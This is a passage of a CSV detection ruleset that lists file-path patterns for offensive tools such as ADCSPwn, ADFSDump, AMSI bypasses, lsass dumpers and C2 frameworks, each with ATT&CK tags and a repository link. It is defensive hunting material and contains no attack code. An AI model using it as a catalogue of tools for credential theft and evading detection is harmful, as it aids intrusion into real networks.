"*\ADCollector3.sln*",".{0,1000}\\ADCollector3\.sln.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","0","N/A","7","7","619","83","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z" "*\ADCollector3\*",".{0,1000}\\ADCollector3\\.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - 
TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","0","N/A","7","7","619","83","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z" "*\adcs.py*",".{0,1000}\\adcs\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\ADCSCoercePotato\*",".{0,1000}\\ADCSCoercePotato\\.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","0","N/A","10","2","176","23","2024-02-28T22:37:14Z","2024-02-26T12:08:34Z" "*\ADCSPwn*",".{0,1000}\\ADCSPwn.{0,1000}","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","0","N/A","10","8","796","119","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z" "*\ADCSPwn.exe*",".{0,1000}\\ADCSPwn\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\adcsync.py*",".{0,1000}\\adcsync\.py.{0,1000}","offensive_tool_keyword","adcsync","Use ESC1 to perform a makeshift DCSync and dump hashes","T1003.006 - T1021","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/JPG0mez/ADCSync","1","0","N/A","9","2","185","21","2023-11-02T21:41:08Z","2023-10-04T01:56:50Z" "*\add_computer.py*",".{0,1000}\\add_computer\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\addcomputer_LDAP_spn.py*",".{0,1000}\\addcomputer_LDAP_spn\.py.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*\addcomputer_with_spns.py*",".{0,1000}\\addcomputer_with_spns\.py.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL 
exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*\Add-RemoteRegBackdoor.ps1*",".{0,1000}\\Add\-RemoteRegBackdoor\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\ADeleg.exe*",".{0,1000}\\ADeleg\.exe.{0,1000}","offensive_tool_keyword","adeleg","an Active Directory delegation management tool. It allows you to make a detailed inventory of delegations set up so far in a forest","T1595 - T1087.002 - T1069.002","TA0007 - TA0004","N/A","N/A","Discovery","https://github.com/mtth-bfft/adeleg","1","0","N/A","8","3","246","30","2023-06-07T15:08:53Z","2022-02-09T19:47:04Z" "*\ADeleg.exe*",".{0,1000}\\ADeleg\.exe.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","6","1","65","6","2024-04-30T20:17:27Z","2024-03-04T03:44:52Z" "*\adeleg.pdb*",".{0,1000}\\adeleg\.pdb.{0,1000}","offensive_tool_keyword","adeleg","an Active Directory delegation management tool. 
It allows you to make a detailed inventory of delegations set up so far in a forest","T1595 - T1087.002 - T1069.002","TA0007 - TA0004","N/A","N/A","Discovery","https://github.com/mtth-bfft/adeleg","1","0","N/A","8","3","246","30","2023-06-07T15:08:53Z","2022-02-09T19:47:04Z" "*\adeleg\adeleg\*",".{0,1000}\\adeleg\\adeleg\\.{0,1000}","offensive_tool_keyword","adeleg","an Active Directory delegation management tool. It allows you to make a detailed inventory of delegations set up so far in a forest","T1595 - T1087.002 - T1069.002","TA0007 - TA0004","N/A","N/A","Discovery","https://github.com/mtth-bfft/adeleg","1","0","N/A","8","3","246","30","2023-06-07T15:08:53Z","2022-02-09T19:47:04Z" "*\adeleg\winldap\*",".{0,1000}\\adeleg\\winldap\\.{0,1000}","offensive_tool_keyword","adeleg","an Active Directory delegation management tool. It allows you to make a detailed inventory of delegations set up so far in a forest","T1595 - T1087.002 - T1069.002","TA0007 - TA0004","N/A","N/A","Discovery","https://github.com/mtth-bfft/adeleg","1","0","N/A","8","3","246","30","2023-06-07T15:08:53Z","2022-02-09T19:47:04Z" "*\Adeleginator-main*",".{0,1000}\\Adeleginator\-main.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","6","1","65","6","2024-04-30T20:17:27Z","2024-03-04T03:44:52Z" "*\adeleg-main*",".{0,1000}\\adeleg\-main.{0,1000}","offensive_tool_keyword","adeleg","an Active Directory delegation management tool. 
It allows you to make a detailed inventory of delegations set up so far in a forest","T1595 - T1087.002 - T1069.002","TA0007 - TA0004","N/A","N/A","Discovery","https://github.com/mtth-bfft/adeleg","1","0","N/A","8","3","246","30","2023-06-07T15:08:53Z","2022-02-09T19:47:04Z" "*\ADFSDump.*",".{0,1000}\\ADFSDump\..{0,1000}","offensive_tool_keyword","ADFSDump","A C# tool to dump all sorts of goodies from AD FS","T1081 - T1003 - T1114 - T1212","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/mandiant/ADFSDump","1","0","N/A","10","3","287","63","2023-08-07T16:58:37Z","2019-03-20T22:31:16Z" "*\ADFSDump.exe*",".{0,1000}\\ADFSDump\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\ADFSDump\*",".{0,1000}\\ADFSDump\\.{0,1000}","offensive_tool_keyword","ADFSDump","A C# tool to dump all sorts of goodies from AD FS","T1081 - T1003 - T1114 - T1212","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/mandiant/ADFSDump","1","0","N/A","10","3","287","63","2023-08-07T16:58:37Z","2019-03-20T22:31:16Z" "*\ADFSDump-master*",".{0,1000}\\ADFSDump\-master.{0,1000}","offensive_tool_keyword","ADFSDump","A C# tool to dump all sorts of goodies from AD FS","T1081 - T1003 - T1114 - T1212","TA0006 - TA0005 - TA0009","N/A","N/A","Credential 
Access","https://github.com/mandiant/ADFSDump","1","0","N/A","10","3","287","63","2023-08-07T16:58:37Z","2019-03-20T22:31:16Z" "*\ADFSpoof.py*",".{0,1000}\\ADFSpoof\.py.{0,1000}","offensive_tool_keyword","ADFSpoof","A python tool to forge AD FS security tokens.","T1600 - T1600.001 - T1552 - T1552.004","TA0006 - TA0001","N/A","N/A","Sniffing & Spoofing","https://github.com/mandiant/ADFSpoof","1","0","N/A","10","4","330","57","2024-04-03T11:48:50Z","2019-03-20T22:30:58Z" "*\ADFSpray*",".{0,1000}\\ADFSpray.{0,1000}","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","0","N/A","N/A","1","83","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z" "*\ADFSRelay\*",".{0,1000}\\ADFSRelay\\.{0,1000}","offensive_tool_keyword","ADFSRelay","NTLMParse is a utility for decoding base64-encoded NTLM messages and printing information about the underlying properties and fields within the message. Examining these NTLM messages is helpful when researching the behavior of a particular NTLM implementation. ADFSRelay is a proof of concept utility developed while researching the feasibility of NTLM relaying attacks targeting the ADFS service. This utility can be leveraged to perform NTLM relaying attacks targeting ADFS","T1140 - T1212 - T1557","TA0007 - TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/praetorian-inc/ADFSRelay","1","0","N/A","10","2","169","13","2022-06-22T03:01:00Z","2022-05-12T01:20:14Z" "*\adm2sys.py*",".{0,1000}\\adm2sys\.py.{0,1000}","offensive_tool_keyword","PyExec","This is a very simple privilege escalation technique from admin to System. 
This is the same technique PSExec uses.","T1134 - T1055 - T1548.002","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/OlivierLaflamme/PyExec","1","0","N/A","9","1","10","7","2019-09-11T13:56:04Z","2019-09-11T13:54:15Z" "*\admin_persistence_winlogon*",".{0,1000}\\admin_persistence_winlogon.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","10","6","524","52","2024-04-05T14:21:15Z","2023-04-05T09:39:33Z" "*\admin-panels.txt*",".{0,1000}\\admin\-panels\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*\ADSearch.exe*",".{0,1000}\\ADSearch\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\AdsMasquerade.ps1*",".{0,1000}\\AdsMasquerade\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\AES_cryptor.py *",".{0,1000}\\AES_cryptor\.py\s.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","0","N/A","10","8","796","162","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" "*\agent_exe.exe*",".{0,1000}\\agent_exe\.exe.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - 
TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*\alan.log*",".{0,1000}\\alan\.log.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*\Alan.v*.zip*",".{0,1000}\\Alan\.v.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*\Alcatraz.exe*",".{0,1000}\\Alcatraz\.exe.{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1552","235","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" "*\All_attack.txt*",".{0,1000}\\All_attack\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*\AlwaysInstallElevated.cs*",".{0,1000}\\AlwaysInstallElevated\.cs.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. 
no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*\amsi\dll.zip*",".{0,1000}\\amsi\\dll\.zip.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*\amsi\hook-win32.dll*",".{0,1000}\\amsi\\hook\-win32\.dll.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*\amsi\hook-win64.dll*",".{0,1000}\\amsi\\hook\-win64\.dll.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*\AmsiBypass.*",".{0,1000}\\AmsiBypass\..{0,1000}","offensive_tool_keyword","AmsiBypass","bypassing Anti-Malware Scanning Interface (AMSI) features","T1548.002","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell","1","0","N/A","10","10","1492","260","2023-03-01T17:09:02Z","2019-05-14T06:09:25Z" "*\AMSIPatcher.cs*",".{0,1000}\\AMSIPatcher\.cs.{0,1000}","offensive_tool_keyword","SharpKiller","Lifetime AMSI bypass by @ZeroMemoryEx ported to .NET Framework 4.8","T1211 - T1202 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/S1lkys/SharpKiller","1","0","N/A","10","4","338","41","2024-01-25T09:24:57Z","2023-10-21T17:27:59Z" "*\AmsiProvider.cpp*",".{0,1000}\\AmsiProvider\.cpp.{0,1000}","offensive_tool_keyword","AMSI-Provider","A fake AMSI Provider which can be used for persistence","T1546.013 - T1574.012","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/netbiosX/AMSI-Provider","1","0","N/A","10","2","133","15","2021-05-16T16:56:15Z","2021-05-15T16:18:47Z" "*\AmsiProvider.sln*",".{0,1000}\\AmsiProvider\.sln.{0,1000}","offensive_tool_keyword","AMSI-Provider","A fake AMSI Provider which can be used for persistence","T1546.013 - T1574.012","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/netbiosX/AMSI-Provider","1","0","N/A","10","2","133","15","2021-05-16T16:56:15Z","2021-05-15T16:18:47Z" "*\AMSI-Provider-main*",".{0,1000}\\AMSI\-Provider\-main.{0,1000}","offensive_tool_keyword","AMSI-Provider","A fake AMSI Provider which can be used for persistence","T1546.013 - T1574.012","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/netbiosX/AMSI-Provider","1","0","N/A","10","2","133","15","2021-05-16T16:56:15Z","2021-05-15T16:18:47Z" "*\AmsiTrigger.csproj*",".{0,1000}\\AmsiTrigger\.csproj.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. 
On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","0","https://www.rythmstick.net/posts/amsitrigger/","10","10","N/A","N/A","N/A","N/A" "*\AmsiTrigger.pdb*",".{0,1000}\\AmsiTrigger\.pdb.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*\AmsiTrigger.sln*",".{0,1000}\\AmsiTrigger\.sln.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","0","https://www.rythmstick.net/posts/amsitrigger/","10","10","N/A","N/A","N/A","N/A" "*\AMSITrigger\*",".{0,1000}\\AMSITrigger\\.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. 
On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","0","https://www.rythmstick.net/posts/amsitrigger/","10","10","N/A","N/A","N/A","N/A" "*\AMSITrigger-master*",".{0,1000}\\AMSITrigger\-master.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","0","https://www.rythmstick.net/posts/amsitrigger/","10","10","N/A","N/A","N/A","N/A" "*\Andrew.dmp*",".{0,1000}\\Andrew\.dmp.{0,1000}","offensive_tool_keyword","AndrewSpecial","AndrewSpecial - dumping lsass memory stealthily","T1003.001 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/hoangprod/AndrewSpecial","1","0","N/A","10","4","381","98","2019-06-02T02:49:28Z","2019-01-18T19:12:09Z" "*\anti_analysis.exe*",".{0,1000}\\anti_analysis\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\anti_debug.exe*",".{0,1000}\\anti_debug\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - 
TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\antiDefense.cpp*",".{0,1000}\\antiDefense\.cpp.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","0","N/A","9","1","50","13","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z" "*\AntiSandbox.go*",".{0,1000}\\AntiSandbox\.go.{0,1000}","offensive_tool_keyword","goMatrixC2","C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.","T1090 - T1027 - T1071","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/n1k7l4i/goMatrixC2","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*\AntiSandbox.go*",".{0,1000}\\AntiSandbox\.go.{0,1000}","offensive_tool_keyword","goZulipC2","C2 leveraging Zulip Messaging Platform as Backend.","T1090 - T1090.003 - T1071 - T1071.001","TA0011 - TA0009","N/A","N/A","C2","https://github.com/n1k7l4i/goZulipC2","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*\AntiTamper.exe*",".{0,1000}\\AntiTamper\.exe.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*\AoratosWin*",".{0,1000}\\AoratosWin.{0,1000}","offensive_tool_keyword","AoratosWin","A tool that removes traces of executed applications on Windows OS.","T1070 - T1564","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","0","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" 
"*\apc_injection.exe*",".{0,1000}\\apc_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\APCLdr.*",".{0,1000}\\APCLdr\..{0,1000}","offensive_tool_keyword","APCLdr","APCLdr: Payload Loader With Evasion Features","T1027 - T1055 - T1055.002 - T1055.003 - T1070 - T1070.004 - T1071 - T1106 - T1574.001","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/NUL0x4C/APCLdr","1","1","N/A","N/A","4","300","52","2023-01-22T04:24:33Z","2023-01-21T18:09:36Z" "*\api_hooking.exe*",".{0,1000}\\api_hooking\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\Apollo.exe*",".{0,1000}\\Apollo\.exe.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*\Appdata\*\aloy64.exe*",".{0,1000}\\Appdata\\.{0,1000}\\aloy64\.exe.{0,1000}","offensive_tool_keyword","_","suspicious executable names in suspicious paths related to exploitation tools","T1036 - T1204","TA0005 - TA0002","N/A","N/A","Exploitation 
tools","N/A","1","0","N/A","9","10","N/A","N/A","N/A","N/A" "*\Appdata\*\Beacon.exe*",".{0,1000}\\Appdata\\.{0,1000}\\Beacon\.exe.{0,1000}","offensive_tool_keyword","_","suspicious executable names in suspicious paths related to exploitation tools","T1036 - T1204","TA0005 - TA0002","N/A","N/A","Exploitation tools","N/A","1","0","N/A","9","10","N/A","N/A","N/A","N/A" "*\Appdata\*\Beacon01.exe*",".{0,1000}\\Appdata\\.{0,1000}\\Beacon01\.exe.{0,1000}","offensive_tool_keyword","_","suspicious executable names in suspicious paths related to exploitation tools","T1036 - T1204","TA0005 - TA0002","N/A","N/A","Exploitation tools","N/A","1","0","N/A","9","10","N/A","N/A","N/A","N/A" "*\Appdata\*\Beacon02.exe*",".{0,1000}\\Appdata\\.{0,1000}\\Beacon02\.exe.{0,1000}","offensive_tool_keyword","_","suspicious executable names in suspicious paths related to exploitation tools","T1036 - T1204","TA0005 - TA0002","N/A","N/A","Exploitation tools","N/A","1","0","N/A","9","10","N/A","N/A","N/A","N/A" "*\Appdata\*\kitty.exe*",".{0,1000}\\Appdata\\.{0,1000}\\kitty\.exe.{0,1000}","offensive_tool_keyword","_","suspicious executable names in suspicious paths related to exploitation tools","T1036 - T1204","TA0005 - TA0002","N/A","N/A","Exploitation tools","N/A","1","0","N/A","9","10","N/A","N/A","N/A","N/A" "*\AppData\Local\Temp\Camera.ps1*",".{0,1000}\\AppData\\Local\\Temp\\Camera\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 